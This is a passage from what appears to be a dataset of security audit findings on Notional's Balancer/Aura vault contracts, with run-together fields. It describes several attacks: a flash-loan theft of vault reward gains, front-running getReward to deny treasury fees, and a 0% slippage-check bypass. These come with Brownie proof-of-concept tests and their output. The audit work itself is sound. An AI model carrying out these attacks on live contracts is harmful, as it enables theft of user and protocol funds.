calldataload(164))), // 164 = 5 * 32 + 4\\n 0xffffffff00000000000000000000000000000000000000000000000000000000\\n )\\n }\\n \\n if (selector == 0xf7fcd384) {\\n \\n (\\n inputToken, \\n outputToken, \\n , \\n recipient, \\n inputTokenAmount, \\n minOutputTokenAmount\\n ) = abi.decode(_data[4:], (address, address, address, address, uint256, uint256));\\n require(recipient == from, \"Mismatched recipient\");\\n } else if (selector == 0x6af479b2) {\\n // sellTokenForTokenToUniswapV3()\\n bytes memory encodedPath;\\n // prettier-ignore\\n (\\n encodedPath,\\n inputTokenAmount, \\n minOutputTokenAmount, \\n recipient\\n ) = abi.decode(_data[4:], (bytes, uint256, uint256, address));\\n require(recipient == from, \"Mismatched recipient\");\\n }\\n }\\n}\\n```\\nчAttackers can craft a 0x order that redirects the assets to their wallet, leading to loss of assets for the vaults and their users.ч```\\nFile: UniV2Adapter.sol\\n function getExecutionData(address from, Trade calldata trade)\\n..SNIP..\\n executionCallData = abi.encodeWithSelector(\\n IUniV2Router2.swapExactTokensForTokens.selector,\\n trade.amount,\\n trade.limit,\\n data.path,\\n from,\\n trade.deadline\\n );\\n```\\n -Settlement slippage is not implemented correctly which may lead to some vaults being impossible to settleчhighчThe contract is supposed to implement a different max slippage value depending on the settlement type, but these values have no impact because they are never actually applied. Instead, regardless of settlement type or function inputs, max slippage will always be limited to the value of balancerPoolSlippageLimitPercent. This can be problematic because the default value allows only 1% slippage. If settlement slippage goes outside of 1% then settlement of any kind will become impossible.\\nBoosted3TokenAuraHelper.sol#L95-L99\\n```\\n params.minPrimary = poolContext._getTimeWeightedPrimaryBalance(\\n oracleContext, strategyContext, bptToSettle\\n );\\n\\n params.minPrimary = params.minPrimary * strategyContext.vaultSettings.balancerPoolSlippageLimitPercent / \\n uint256(BalancerConstants.VAULT_PERCENT_BASIS);\\n```\\n\\nBoosted3TokenAuraHelper#_executeSettlement first sets params.minPrimary overwriting any value from function input. Next it adjusts minPrimary by balancerPoolSlippageLimitPercent, which is a constant set at pool creation; however it doesn't ever adjust it by Params.DynamicTradeParams.oracleSlippagePercent. This means that the max possible slippage regardless of settlement type is limited to the slippage allowed by balancerPoolSlippageLimitPercent. If the max slippage ever goes outside of this range, then settlement of any kind will become impossible.чParams.DynamicTradeParams.oracleSlippagePercent is validated in every scenario before Boosted3TokenAuraHelper#_executeSettlement is called, so we can apply these values directly when calculating minPrimary:\\n```\\n params.minPrimary = poolContext._getTimeWeightedPrimaryBalance(\\n oracleContext, strategyContext, bptToSettle\\n );\\n\\n+ DynamicTradeParams memory callbackData = abi.decode(\\n+ params.secondaryTradeParams, (DynamicTradeParams)\\n+ );\\n\\n- params.minPrimary = params.minPrimary * strategyContext.vaultSettings.balancerPoolSlippageLimitPercent / \\n+ params.minPrimary = params.minPrimary * \\n+ (strategyContext.vaultSettings.balancerPoolSlippageLimitPercent - callbackData.oracleSlippagePercent) / \\n uint256(BalancerConstants.VAULT_PERCENT_BASIS);\\n```\\nчSettlement may become impossibleч```\\n params.minPrimary = poolContext._getTimeWeightedPrimaryBalance(\\n oracleContext, strategyContext, bptToSettle\\n );\\n\\n params.minPrimary = params.minPrimary * strategyContext.vaultSettings.balancerPoolSlippageLimitPercent / \\n uint256(BalancerConstants.VAULT_PERCENT_BASIS);\\n```\\n -Gain From Balancer Vaults Can Be StolenчmediumчThe BPT gain (rewards) of the vault can be stolen by an attacker.\\nAt T0 (Time 0), assume that the state of the WETH/wstETH MetaPool Vault is as follows:\\ntotalBPTHeld = 1000 BPT\\ntotalStrategyTokenGlobal = 1000\\n1 Strategy Token can claim 1 BPT\\nAlice holds 1000 Strategy Tokens, and she is the only person invested in the vault at this point in time\\nAssume that if the `reinvestReward` is called, it will reinvest 1000 BPT back into the vault. Thus, if the `reinvestReward` is called, the `totalBPTHeld` of the vault will become 2000 BPT.\\nFollowing is the description of the attack:\\nThe attacker notice that if the `reinvestReward` is called, it will result in a large increase in the total BPT held by the vault\\nThe attacker flash-loan a large amount of WETH (e.g. 1,000,000) from a lending protocol (e.g. dydx)\\nEnter the vault by depositing 1,000,000 WETH by calling the `VaultAccountAction.enterVault` function. However, do not borrow any cash from Notional by setting the `fCash` parameter of the `VaultAccountAction.enterVault` function to `0`.\\nThere is no need to borrow from Notional as the attacker could already flash-loan a large amount of WETH with a non-existence fee rate (e.g. 1 Wei in dydx). Most importantly, the vault fee will only be charged if the user borrows from Notional. The fee is assessed within the `VaultAccount._borrowIntoVault`, which will be skipped if users are not borrowing. By not borrowing from Notional, the attacker does not need to pay any fee when entering the vault and this will make the attacker more profitable.\\nThe vault will deposit 1,000,000 WETH to the Balancer pool and receive a large amount of BPT in return. For simplicity's sake, assume that the vault receives 1,000,000 BPT in return.\\nBased on the `StrategyUtils._convertBPTClaimToStrategyTokens` function, the attacker will receive 100,000 strategy tokens. The state of the vault will be as follows after the attacker deposits:\\ntotalBPTHeld = 1,001,000 BPT\\ntotalStrategyTokenGlobal = 1,001,000\\n1 Strategy Token can claim 1 BPT\\nAlice holds 1000 Strategy Tokens\\nAttacker holds 1,000,000 Strategy Tokens\\nThe attacker calls the `reinvestReward` function, and reward tokens will be reinvested. Assume that the vault receives 1000 BPT. The state of the vault will be as follows after the reinvest:\\ntotalBPTHeld = 1,002,000 BPT\\ntotalStrategyTokenGlobal = 1,001,000\\n1 Strategy Token can claim ~1.0009 BPT\\nAlice holds 1000 Strategy Tokens\\nAttacker holds 1,000,000 Strategy Tokens\\nThe attacker exits the vault with all his strategy tokens by calling the `VaultAccountAction.exitVault` function. This will cause the vault the redeem all the 100,000 Strategy Tokens owned by the attacker. Based on the `StrategyUtils._convertStrategyTokensToBPTClaim` function, the attacker will receive 1,000,999 BPT in return. Note that there is no fee for exiting the vault and there is no need for repaying the debt as the attacker did not borrow any assets from Notional at the beginning.\\n```\\nbptClaim = (strategyTokenAmount * context.totalBPTHeld) / context.vaultState.totalStrategyTokenGlobal;\\n1,000,999 = (1000000 * 1002000) / 1001000\\n```\\n\\nProceed to repay the flash-loan at the end of the transaction. All the above steps are executed within a single transaction. Within a single transaction/block, the attacker is able to increase his holding of 1,000,000 BPT to 1,000,999 BPT after calling the `reinvestReward` function, and effectively gain around 999 BPT.\\nAlice who had been invested in the vault since the vault was first launched should be entitled to the majority of the rewards (Close to 1000 BPT). However, the attacker who came in right before the `reinvestReward` function was triggered managed to obtain almost all of her allocated shares of rewards (999 BPT) and left only 1 BPT for Alice.\\nNote: A flash-loan is not required if the attacker has sufficient liquidity to carry out the attack or the vault does not have much liquidity.\\nFollowing are the two functions for converting between BPT and Strategy Token for reference.\\n```\\n/// @notice Converts BPT to strategy tokens\\nfunction _convertBPTClaimToStrategyTokens(StrategyContext memory context, uint256 bptClaim)\\n internal pure returns (uint256 strategyTokenAmount) {\\n if (context.totalBPTHeld == 0) {\\n // Strategy tokens are in 8 decimal precision, BPT is in 18. Scale the minted amount down.\\n return (bptClaim * uint256(Constants.INTERNAL_TOKEN_PRECISION)) / \\n BalancerConstants.BALANCER_PRECISION;\\n }\\n\\n // BPT held in maturity is calculated before the new BPT tokens are minted, so this calculation\\n // is the tokens minted that will give the account a corresponding share of the new bpt balance held.\\n // The precision here will be the same as strategy token supply.\\n strategyTokenAmount = (bptClaim * context.vaultState.totalStrategyTokenGlobal) / context.totalBPTHeld;\\n}\\n```\\n\\n```\\n/// @notice Converts strategy tokens to BPT\\nfunction _convertStrategyTokensToBPTClaim(StrategyContext memory context, uint256 strategyTokenAmount)\\n internal pure returns (uint256 bptClaim) {\\n require(strategyTokenAmount <= context.vaultState.totalStrategyTokenGlobal);\\n if (context.vaultState.totalStrategyTokenGlobal > 0) {\\n bptClaim = (strategyTokenAmount * context.totalBPTHeld) / context.vaultState.totalStrategyTokenGlobal;\\n }\\n}\\n```\\nчFollowing are the list of root causes of the issue and some recommendation to mitigate them.\\n`reinvestReward` function is permissionless and can be called by anyone. It is recommended to implement access control to ensure that this function can only be triggered by Notional. Do note that even if the attacker cannot trigger the `reinvestReward` function, it is still possible for the attacker to front-run and back-end the `reinvestReward` transaction to carry out the attack if they see this transaction in the public mempool. Thus, consider sending the `reinvestReward` transaction as a private transaction via Flashbot so that the attacker cannot sandwich the transaction.\\nThere is no withdrawal fee. Also, there is no deposit fee as long as users did not borrow from Notional. Therefore, this attack is mostly profitable. It is recommended to impose a fee on the users of the vault even if the users did not borrow from Notional. All users should be charged a fee for the use of the vault. This will make the attack less likely to be profitable in most cases.\\nUsers can enter and exit the vault within the same transaction/block. This allows the attacker to leverage the flash-loan facility to reduce the cost of the attack to almost nothing. It is recommended to prevent users from entering and exiting the vault within the same transaction/block. If the user entered the vault in this block, he/she could only exit at the next block.\\nThere is no snapshotting to keep track of the deposit to ensure that BPT gain/rewards distributions are weighted according to deposit duration. Thus, a whale could deposit right before the `reinvestReward` function is triggered and exit the vault afterward and reap most of the gains. Consider implementing snapshotting within the vault.чLoss of assets for the users as their BPT gain (rewards) can be stolen. This issue affects all balancer-related vaults that contain the permissionless `reinvestReward` function.ч```\\nbptClaim = (strategyTokenAmount * context.totalBPTHeld) / context.vaultState.totalStrategyTokenGlobal;\\n1,000,999 = (1000000 * 1002000) / 1001000\\n```\\n -Malicious Users Can Deny Notional Treasury From Receiving FeeчmediumчMalicious users can deny Notional Treasury from receiving fees when rewards are reinvested.\\nThe `claimRewardTokens` function will harvest the reward tokens from the Aura Pool, and the reward tokens will be transferred to the Balancer Vault. At lines 77-78, a portion of the reward tokens would be sent to the `FEE_RECEIVER`. After clarifying with the sponsor, it was understood that the `FEE_RECEIVER` would be set to Notional Treasury so that it would receive some of the accrued reward tokens.\\n```\\nFile: AuraStakingMixin.sol\\n function claimRewardTokens() external returns (uint256[] memory claimedBalances) {\\n uint16 feePercentage = BalancerVaultStorage.getStrategyVaultSettings().feePercentage;\\n IERC20[] memory rewardTokens = _rewardTokens();\\n\\n uint256 numRewardTokens = rewardTokens.length;\\n\\n claimedBalances = new uint256[](numRewardTokens);\\n for (uint256 i; i < numRewardTokens; i++) {\\n claimedBalances[i] = rewardTokens[i].balanceOf(address(this));\\n }\\n\\n AURA_REWARD_POOL.getReward(address(this), true);\\n for (uint256 i; i < numRewardTokens; i++) {\\n claimedBalances[i] = rewardTokens[i].balanceOf(address(this)) - claimedBalances[i];\\n\\n if (claimedBalances[i] > 0 && feePercentage != 0 && FEE_RECEIVER != address(0)) {\\n uint256 feeAmount = claimedBalances[i] * feePercentage / BalancerConstants.VAULT_PERCENT_BASIS;\\n rewardTokens[i].checkTransfer(FEE_RECEIVER, feeAmount);\\n claimedBalances[i] -= feeAmount;\\n }\\n }\\n\\n emit BalancerEvents.ClaimedRewardTokens(rewardTokens, claimedBalances);\\n }\\n```\\n\\nWithin the `claimRewardTokens` function, it will call the `AURA_REWARD_POOL.getReward` to harvest the reward tokens. Within the `claimRewardTokens` function, it also uses the pre-balance and post-balance of the reward tokens to check the actual amount of reward tokens that are transferred into the vault.\\nHowever, the issue is that anyone can claim reward tokens from Aura Pool on behalf of any address. Following is the implementation of the `getReward` function taken from Aura's BaseRewardPool4626 contract called by the vault for reference.\\n```\\n/**\\n * @dev Gives a staker their rewards, with the option of claiming extra rewards\\n * @param _account Account for which to claim\\n * @param _claimExtras Get the child rewards too?\\n */\\nfunction getReward(address _account, bool _claimExtras) public updateReward(_account) returns(bool){\\n uint256 reward = earned(_account);\\n if (reward > 0) {\\n rewards[_account] = 0;\\n rewardToken.safeTransfer(_account, reward);\\n IDeposit(operator).rewardClaimed(pid, _account, reward);\\n emit RewardPaid(_account, reward);\\n }\\n\\n //also get rewards from linked rewards\\n if(_claimExtras){\\n for(uint i=0; i < extraRewards.length; i++){\\n IRewards(extraRewards[i]).getReward(_account);\\n }\\n }\\n return true;\\n}\\n\\nmodifier updateReward(address account) {\\n rewardPerTokenStored = rewardPerToken();\\n lastUpdateTime = lastTimeRewardApplicable();\\n if (account != address(0)) {\\n rewards[account] = earned(account);\\n userRewardPerTokenPaid[account] = rewardPerTokenStored;\\n }\\n _;\\n}\\n\\nfunction earned(address account) public view returns (uint256) {\\n return\\n balanceOf(account)\\n .mul(rewardPerToken().sub(userRewardPerTokenPaid[account]))\\n .div(1e18)\\n .add(rewards[account]);\\n}\\n```\\n\\nAssume that a malicious user front runs a call to claim rewards tokens. When a keeper calls the `AURA_REWARD_POOL.getReward` to harvest the reward tokens, it will return no reward tokens, and therefore the difference between the pre-balance and post-balance of the reward tokens will amount to zero. Therefore, no reward tokens will be sent to the `FEE_RECEIVER` (Notional Treasury) as a fee.\\nProof-of-Concept\\nThe `test_claim_rewards_success` test case shows that under normal circumstances, the Notional treasury will receive a portion of the accrued BAL and AURA as fees.\\nThe `test_claim_rewards_success_frontrun` test case shows that if the `getReward` is front-run by an attacker, the Notional treasury will receive nothing.\\nThe following is the test script and its result.\\n```\\nimport pytest\\nfrom brownie import ZERO_ADDRESS, Wei, accounts, interface\\nfrom tests.fixtures import *\\nfrom tests.balancer.helpers import enterMaturity, get_metastable_amounts\\nfrom scripts.common import get_univ3_single_data, get_univ3_batch_data, DEX_ID, TRADE_TYPE\\n\\nchain = Chain()\\n\\ndef test_claim_rewards_success(StratStableETHstETH):\\n (env, vault) = StratStableETHstETH\\n primaryBorrowAmount = 100e8\\n depositAmount = 50e18\\n enterMaturity(env, vault, 1, 0, depositAmount, primaryBorrowAmount, accounts[0])\\n chain.sleep(3600 * 24 * 365)\\n chain.mine()\\n feeReceiver = vault.getStrategyContext()[\"baseStrategy\"][\"feeReceiver\"]\\n feePercentage = vault.getStrategyContext()[\"baseStrategy\"][\"vaultSettings\"][\"feePercentage\"] / 1e2\\n assert env.tokens[\"BAL\"].balanceOf(vault.address) == 0\\n assert env.tokens[\"AURA\"].balanceOf(vault.address) == 0\\n assert env.tokens[\"BAL\"].balanceOf(feeReceiver) == 0\\n assert env.tokens[\"AURA\"].balanceOf(feeReceiver) == 0\\n\\n vault.claimRewardTokens({\"from\": accounts[1]})\\n\\n # Test that the fee receiver received portion of the rewards as fee\\n assert env.tokens[\"BAL\"].balanceOf(feeReceiver) > 0\\n assert env.tokens[\"AURA\"].balanceOf(feeReceiver) > 0\\n\\ndef test_claim_rewards_success_frontrun(StratStableETHstETH):\\n (env, vault) = StratStableETHstETH\\n primaryBorrowAmount = 100e8\\n depositAmount = 50e18\\n enterMaturity(env, vault, 1, 0, depositAmount, primaryBorrowAmount, accounts[0])\\n chain.sleep(3600 * 24 * 365)\\n chain.mine()\\n feeReceiver = vault.getStrategyContext()[\"baseStrategy\"][\"feeReceiver\"]\\n feePercentage = vault.getStrategyContext()[\"baseStrategy\"][\"vaultSettings\"][\"feePercentage\"] / 1e2\\n assert env.tokens[\"BAL\"].balanceOf(vault.address) == 0\\n assert env.tokens[\"AURA\"].balanceOf(vault.address) == 0\\n assert env.tokens[\"BAL\"].balanceOf(feeReceiver) == 0\\n assert env.tokens[\"AURA\"].balanceOf(feeReceiver) == 0\\n\\n auraPool = interface.IAuraRewardPool(vault.getStrategyContext()[\"stakingContext\"][\"auraRewardPool\"])\\n auraPool.getReward(vault.address, True, {\"from\": accounts[5]}) # Attacker frontrun the getReward\\n vault.claimRewardTokens({\"from\": accounts[1]})\\n\\n # Test that the fee receiver received nothing due the frontrunning\\n assert env.tokens[\"BAL\"].balanceOf(feeReceiver) == 0\\n assert env.tokens[\"AURA\"].balanceOf(feeReceiver) == 0\\n```\\n\\n```\\n❯ brownie test tests/balancer/rewards/test_rewards_stable_eth_steth.py --network mainnet-fork\\nBrownie v1.18.1 - Python development framework for Ethereum\\n\\n=============================================================================================== test session starts ===============================================================================================\\nplatform linux -- Python 3.8.10, pytest-6.2.5, py-1.11.0, pluggy-1.0.0\\nplugins: eth-brownie-1.18.1, hypothesis-6.27.3, forked-1.4.0, xdist-1.34.0, web3-5.27.0\\ncollected 2 items \\nAttached to local RPC client listening at '127.0.0.1:8545'// rest of code\\n\\ntests/balancer/rewards/test_rewards_stable_eth_steth.py .. [100%]\\n\\n========================================================================================== 2 passed, 1 warning in 5.72s ===========================================================================================\\n```\\nчIt is recommended not to use the pre-balance and post-balance of the reward tokens when claiming reward tokens. A more robust internal accounting scheme needs to be implemented to keep track of actual reward tokens received from the pool so that the appropriate amount of the accrued reward tokens can be sent to the Notional Treasury.\\nReference\\nA similar high-risk issue was found in the past audit reportчNotional Treasury will not receive a portion of the accrued reward tokens as fees. Loss of assets for Notional protocol and its governance token holders.ч```\\nFile: AuraStakingMixin.sol\\n function claimRewardTokens() external returns (uint256[] memory claimedBalances) {\\n uint16 feePercentage = BalancerVaultStorage.getStrategyVaultSettings().feePercentage;\\n IERC20[] memory rewardTokens = _rewardTokens();\\n\\n uint256 numRewardTokens = rewardTokens.length;\\n\\n claimedBalances = new uint256[](numRewardTokens);\\n for (uint256 i; i < numRewardTokens; i++) {\\n claimedBalances[i] = rewardTokens[i].balanceOf(address(this));\\n }\\n\\n AURA_REWARD_POOL.getReward(address(this), true);\\n for (uint256 i; i < numRewardTokens; i++) {\\n claimedBalances[i] = rewardTokens[i].balanceOf(address(this)) - claimedBalances[i];\\n\\n if (claimedBalances[i] > 0 && feePercentage != 0 && FEE_RECEIVER != address(0)) {\\n uint256 feeAmount = claimedBalances[i] * feePercentage / BalancerConstants.VAULT_PERCENT_BASIS;\\n rewardTokens[i].checkTransfer(FEE_RECEIVER, feeAmount);\\n claimedBalances[i] -= feeAmount;\\n }\\n }\\n\\n emit BalancerEvents.ClaimedRewardTokens(rewardTokens, claimedBalances);\\n }\\n```\\n -Balancer Vault Will Receive Fewer Assets As The Current Design Does Not Serve The Interest Of Vault ShareholdersчmediumчThe current implementation of reinvesting reward function does not benefit the vault shareholders as the current design does not serve the vault shareholder's interest well. Thus, this will result in Balancer vaults receiving fewer assets.\\nThe `reinvestReward` function of the Balancer Vaults (MetaStable2TokenAuraVault and Boosted3TokenAuraVault) is permissionless and can be called by anyone. By calling `reinvestReward` function, the vault will trade the reward tokens received by the vault for tokens that are accepted by the balancer pool, and deposit them to the pool to obtain more BPT tokens for the vault shareholders. By continuously reinvesting the reward tokens into the pool, the vault shareholders will be able to lay claim to more BPT tokens per share over time.\\n```\\nFile: MetaStable2TokenAuraHelper.sol\\n function reinvestReward(\\n MetaStable2TokenAuraStrategyContext calldata context,\\n ReinvestRewardParams calldata params\\n ) external {\\n```\\n\\n```\\nFile: Boosted3TokenAuraHelper.sol\\n function reinvestReward(\\n Boosted3TokenAuraStrategyContext calldata context,\\n ReinvestRewardParams calldata params\\n ) external { \\n```\\n\\nThe caller of the `reinvestReward` function can specify the trading configuration such as the DEX (e.g. Uniswap, Curve) that the trade should be executed and the slippage (params.tradeParams.oracleSlippagePercent). Note that the slippage defined must be equal to or less than the `strategyContext.vaultSettings.maxRewardTradeSlippageLimitPercent` setting that is currently set to 5% within the test scripts.\\nNotional Vaults support trading in multiple DEX protocols (Curve, Balancer V2, Uniswap V2 & V3 and 0x). Since `reinvestReward` function is callable by anyone, the liquidity provider of the supported DEX protocols will want the trade to be executed on the DEX pool that they invested on. This will allow them to earn an additional transaction fee from the trade. The amount of transaction fee earned will be significant if the volume is large when there are many vaults and reward tokens to be reinvested. In addition, the caller will set the slippage to the maximum configurable threshold (e.g. 5% in this example) to maximize the profit. Therefore, this will end up having various liquidity providers front-running each other to ensure that their `reinvestReward` transaction gets executed in order to extract value.чIt is recommended to implement access control on the `reinvestReward` function to ensure that this function can only be triggered by Notional who has the best interest of its vault users.\\nAlso, consider sending the `reinvestReward` transaction as a private transaction via Flashbot so that the attacker cannot perform any kind of sandwich attack on the reinvest rewards transaction.чThis does not serve the vault shareholder's interest well as the caller of the `reinvestReward` function will not be trading and reinvesting in an optimal way that maximizes the value of the shareholder's assets in the vaults. There is a misalignment in the objective between the vault shareholders and callers. Therefore, the vault and its users will end up on the losing end and receive fewer assets than they should.ч```\\nFile: MetaStable2TokenAuraHelper.sol\\n function reinvestReward(\\n MetaStable2TokenAuraStrategyContext calldata context,\\n ReinvestRewardParams calldata params\\n ) external {\\n```\\n -Existing Slippage Control Can Be Bypassed During Vault SettlementчmediumчThe existing slippage control can be bypassed/disabled during vault settlement, thus allowing the trade to be executed without consideration of its slippage.\\nNote 1: This issue affects MetaStable2 and Boosted3 balancer leverage vaults\\nNote 2: This issue affects the following three (3) processes. However, the root cause and the remediation action are the same for all. Therefore, only the PoC for the \"Emergency vault settlement\" process will be documented in this report, and the other two processes will be omitted for brevity. Refer to \"Appendix I - Normal and Post Maturity Vault Settlement\" for more details.\\nEmergency vault settlement\\nNormal vault settlement\\nPost-Maturity vault settlement.\\nNote 3: The issue affects all the supported DEXs (Curve, Balancer V2, Uniswap V2, Uniswap V3 and 0x) within Notional\\nThe `emergencySettlementSlippageLimitPercent` of the vault is set to 10% as per the environment file provided by Notional.\\n```\\nFile: BalancerEnvironment.py\\n \"postMaturitySettlementSlippageLimitPercent\": 10e6, # 10%\\n \"emergencySettlementSlippageLimitPercent\": 10e6, # 10%\\n```\\n\\nWhen a user calls the `settleVaultEmergency` function, the vault will validate that the slippage (DynamicTradeParams.oracleSlippagePercent) defined by the caller is within the acceptable slippage range by calling `SettlementUtils._decodeParamsAndValidate` function.\\n```\\nFile: MetaStable2TokenAuraHelper.sol\\n function settleVaultEmergency(\\n MetaStable2TokenAuraStrategyContext calldata context, \\n uint256 maturity, \\n bytes calldata data\\n ) external {\\n RedeemParams memory params = SettlementUtils._decodeParamsAndValidate(\\n context.baseStrategy.vaultSettings.emergencySettlementSlippageLimitPercent,\\n data\\n );\\n\\n uint256 bptToSettle = context.baseStrategy._getEmergencySettlementParams({\\n poolContext: context.poolContext.basePool, \\n maturity: maturity, \\n totalBPTSupply: IERC20(context.poolContext.basePool.pool).totalSupply()\\n });\\n```\\n\\nThe `SettlementUtils._decodeParamsAndValidate` function will validate that the slippage (DynamicTradeParams.oracleSlippagePercent) passed in by the caller does not exceed the designated threshold (10%). In Line 41-42, the transaction will revert if the `DynamicTradeParams.oracleSlippagePercent` exceeds the `slippageLimitPercent`. Note that `slippageLimitPercent` is equal to `emergencySettlementSlippageLimitPercent` which is `10%`.\\nThere is an edge case with the condition at Line 41. Consider the following cases:\\nIf `callbackData.oracleSlippagePercent` = 9% and `slippageLimitPercent` = 10%, the condition will evaluate as `False` and transaction will not revert\\nIf `callbackData.oracleSlippagePercent` = 11% and `slippageLimitPercent` = 10%, the condition will evaluate as `True` and transaction will revert because it exceeds the designated threshold.\\nIf `callbackData.oracleSlippagePercent` = 0% and `slippageLimitPercent` = 10%, the condition will evaluate as `False` and transaction will not revert\\nThe problem is that when `callbackData.oracleSlippagePercent` is `0%`, this effectively means that there is no slippage limit. This essentially exceeded the designated threshold (10%), and the transaction should revert instead, but it did not.\\n```\\nFile: SettlementUtils.sol\\n /// @notice Validates that the slippage passed in by the caller\\n /// does not exceed the designated threshold.\\n /// @param slippageLimitPercent configured limit on the slippage from the oracle price allowed\\n /// @param data trade parameters passed into settlement\\n /// @return params abi decoded redemption parameters\\n function _decodeParamsAndValidate(\\n uint32 slippageLimitPercent,\\n bytes memory data\\n ) internal view returns (RedeemParams memory params) {\\n params = abi.decode(data, (RedeemParams));\\n DynamicTradeParams memory callbackData = abi.decode(\\n params.secondaryTradeParams, (DynamicTradeParams)\\n );\\n\\n if (callbackData.oracleSlippagePercent > slippageLimitPercent) {\\n revert Errors.SlippageTooHigh(callbackData.oracleSlippagePercent, slippageLimitPercent);\\n }\\n }\\n```\\n\\nWithin `executeTradeWithDynamicSlippage` function, it will calculate the `trade.limit` by calling the `PROXY.getLimitAmount`. The `trade.limit` is the maximum amount of sellToken that can be sold OR the minimum amount of buyToken the contract is expected to receive from the DEX depending on whether you are performing a sell or buy.\\n```\\nFile: TradingModule.sol\\n function executeTradeWithDynamicSlippage(\\n uint16 dexId,\\n Trade memory trade,\\n uint32 dynamicSlippageLimit\\n ) external override returns (uint256 amountSold, uint256 amountBought) {\\n // This method calls back into the implementation via the proxy so that it has proper\\n // access to storage.\\n trade.limit = PROXY.getLimitAmount(\\n trade.tradeType,\\n trade.sellToken,\\n trade.buyToken,\\n trade.amount,\\n dynamicSlippageLimit\\n );\\n```\\n\\nWithin the `TradingUtils._getLimitAmount` function, when the `slippageLimit` is set to `0`,\\nIf it is a sell trade, the `limitAmount` will be set to `type(uint256).max`. See Line 187\\nIf it is a buy trade, the `limitAmount` will be set to `0`. See Line 207\\nThese effectively remove the slippage limit. Therefore, a malicious user can specify the `callbackData.oracleSlippagePercent` to be `0%` to bypass the slippage validation check.\\n```\\nFile: TradingUtils.sol\\n function _getLimitAmount(\\n TradeType tradeType,\\n address sellToken,\\n address buyToken,\\n uint256 amount,\\n uint32 slippageLimit,\\n uint256 oraclePrice,\\n uint256 oracleDecimals\\n ) internal view returns (uint256 limitAmount) {\\n uint256 sellTokenDecimals = 10 **\\n (\\n sellToken == Deployments.ETH_ADDRESS\\n ? 18\\n : IERC20(sellToken).decimals()\\n );\\n uint256 buyTokenDecimals = 10 **\\n (\\n buyToken == Deployments.ETH_ADDRESS\\n ? 18\\n : IERC20(buyToken).decimals()\\n );\\n\\n if (tradeType == TradeType.EXACT_OUT_SINGLE || tradeType == TradeType.EXACT_OUT_BATCH) {\\n // 0 means no slippage limit\\n if (slippageLimit == 0) {\\n return type(uint256).max;\\n }\\n // For exact out trades, we need to invert the oracle price (1 / oraclePrice)\\n // We increase the precision before we divide because oraclePrice is in\\n // oracle decimals\\n oraclePrice = (oracleDecimals * oracleDecimals) / oraclePrice;\\n // For exact out trades, limitAmount is the max amount of sellToken the DEX can\\n // pull from the contract\\n limitAmount =\\n ((oraclePrice + \\n ((oraclePrice * uint256(slippageLimit)) /\\n Constants.SLIPPAGE_LIMIT_PRECISION)) * amount) / \\n oracleDecimals;\\n\\n // limitAmount is in buyToken precision after the previous calculation,\\n // convert it to sellToken precision\\n limitAmount = (limitAmount * sellTokenDecimals) / buyTokenDecimals;\\n } else {\\n // 0 means no slippage limit\\n if (slippageLimit == 0) {\\n return 0;\\n }\\n // For exact in trades, limitAmount is the min amount of buyToken the contract\\n // expects from the DEX\\n limitAmount =\\n ((oraclePrice -\\n ((oraclePrice * uint256(slippageLimit)) /\\n Constants.SLIPPAGE_LIMIT_PRECISION)) * amount) /\\n oracleDecimals;\\n\\n // limitAmount is in sellToken precision after the previous calculation,\\n // convert it to buyToken precision\\n limitAmount = (limitAmount * buyTokenDecimals) / sellTokenDecimals;\\n }\\n }\\n```\\n\\nProof-of-Concept\\nThe following test case shows that when the slippage is set to 11% (11e6), the transaction will be reverted and fails the test. This is working as intended because the slippage (11%) exceeded the threshold (emergencySettlementSlippageLimitPercent = 10%).\\n```\\ndef test_emergency_single_maturity_success(StratBoostedPoolUSDCPrimary):\\n (env, vault) = StratBoostedPoolUSDCPrimary\\n primaryBorrowAmount = 5000e8\\n depositAmount = 10000e6\\n env.tokens[\"USDC\"].approve(env.notional, 2 ** 256 - 1, {\"from\": env.whales[\"USDC\"]})\\n maturity = enterMaturity(env, vault, 2, 0, depositAmount, primaryBorrowAmount, env.whales[\"USDC\"])\\n strategyContext = vault.getStrategyContext()\\n settings = dict(strategyContext[\"baseStrategy\"][\"vaultSettings\"].dict())\\n settings[\"maxBalancerPoolShare\"] = 0\\n vault.setStrategyVaultSettings(\\n list(settings.values()), \\n {\"from\": env.notional.owner()}\\n )\\n # minPrimary is calculated internally for boosted pools \\n redeemParams = get_redeem_params(0, 0, \\n get_dynamic_trade_params(\\n DEX_ID[\"UNISWAP_V3\"], TRADE_TYPE[\"EXACT_IN_SINGLE\"], 11e6, True, get_univ3_single_data(3000)\\n )\\n )\\n vault.settleVaultEmergency(maturity, redeemParams, {\"from\": env.notional.owner()})\\n vaultState = env.notional.getVaultState(vault.address, maturity)\\n assert vaultState[\"totalStrategyTokens\"] == 0\\n```\\n\\n```\\n❯ brownie test tests/balancer/settlement/test_settlement_boosted_usdc.py --network mainnet-fork\\nBrownie v1.18.1 - Python development framework for Ethereum\\n\\n=============================================================================================== test session starts ===============================================================================================\\nplatform linux -- Python 3.8.10, pytest-6.2.5, py-1.11.0, pluggy-1.0.0\\nplugins: eth-brownie-1.18.1, hypothesis-6.27.3, forked-1.4.0, xdist-1.34.0, web3-5.27.0\\ncollected 1 item \\nAttached to local RPC client listening at '127.0.0.1:8545'// rest of code\\n\\ntests/balancer/settlement/test_settlement_boosted_usdc.py F [100%]\\n\\n==================================================================================================== FAILURES =====================================================================================================\\n```\\n\\nThe following test case shows that when the slippage is set to 0, the transaction does not revert and passes the test. This is not working as intended because having no slippage (0) technically exceeded the threshold (emergencySettlementSlippageLimitPercent = 10%).\\n```\\ndef test_emergency_single_maturity_success(StratBoostedPoolUSDCPrimary):\\n (env, vault) = StratBoostedPoolUSDCPrimary\\n primaryBorrowAmount = 5000e8\\n depositAmount = 10000e6\\n env.tokens[\"USDC\"].approve(env.notional, 2 ** 256 - 1, {\"from\": env.whales[\"USDC\"]})\\n maturity = enterMaturity(env, vault, 2, 0, depositAmount, primaryBorrowAmount, env.whales[\"USDC\"])\\n strategyContext = vault.getStrategyContext()\\n settings = dict(strategyContext[\"baseStrategy\"][\"vaultSettings\"].dict())\\n settings[\"maxBalancerPoolShare\"] = 0\\n vault.setStrategyVaultSettings(\\n list(settings.values()), \\n {\"from\": env.notional.owner()}\\n )\\n # minPrimary is calculated internally for boosted pools \\n redeemParams = get_redeem_params(0, 0, \\n get_dynamic_trade_params(\\n DEX_ID[\"UNISWAP_V3\"], TRADE_TYPE[\"EXACT_IN_SINGLE\"], 0, True, get_univ3_single_data(3000)\\n )\\n )\\n vault.settleVaultEmergency(maturity, redeemParams, {\"from\": env.notional.owner()})\\n vaultState = env.notional.getVaultState(vault.address, maturity)\\n assert 